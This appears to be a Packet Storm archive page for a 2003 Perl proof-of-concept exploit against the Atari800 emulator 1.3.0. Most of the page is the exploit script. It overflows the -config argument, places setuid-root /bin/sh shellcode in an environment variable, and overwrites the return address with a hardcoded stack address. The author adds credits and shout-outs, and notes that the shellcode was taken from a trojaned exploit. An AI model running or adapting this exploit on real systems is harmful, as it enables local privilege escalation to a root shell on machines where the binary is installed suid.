Local exploit for the atari800 Atari emulator on Linux. Makes use of the -config overflow. By default, this binary is not normally default on most Linux installations.
6aadd23c68aa03fd20777677fdf26a1f88f63806dbb1d73b2a7fe7e914ed8645#!perl
########################################################
# PoC By OpTiKoOl, for Atari 800 Emulator, Version 1.3.0
# based on
# http://www.securityfocus.com/archive/1/331518/2003-08-01/2003-08-07/0
# -
# This PoC exploits a bof in parsing a very long config file ( > 250 bytes )
# As in the advisory there's other bofs. but i just researched this one to
# make a Proof-Of-Concept Code.
# In Gentoo Linux (distro where this poc was developed) there isn't any suid
# atari800 binaries. i suppose.. :D
# -
# Tested against Atari800 from portage.
# OpTiKoOl@syners.org & OpTiKoOl@psyfreakz.org
# -
# Big kiss to Neuza ;* ehehe The Buf Smashing The Stack! lol
# and a fucking shout to psychedelic ppl, you rockZ!
# Stay Fresh!
sub head {
print "#####################################################
# PoC against Atari 800 Emulator, Version 1.3.0
# by OpTiKoOl\@syners.org and OpTiKoOl\@psyfreakz.org
# 02/08/2003, CopyLeft by OpTiKoOl ...
# http://www.syners.org/ & http://psyfreakz.org/
# -
# Big Kiss 2 Neuza ;* Chuak! Chuak!
#\n";
}
# this sc was ripped from a fake (trojaned) exploit...
# but this is a real shellcode, so enjoy :D
$shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" #setuid 0
. "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
. "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
. "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
$buf = "SYNERSOWNZ" x 25;
$ENV{'SYNERS'} = $shellcode;
$buf .= "\xad\xff\xff\xbf";
&head;
exec("/usr/bin/atari800 -config $buf");
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed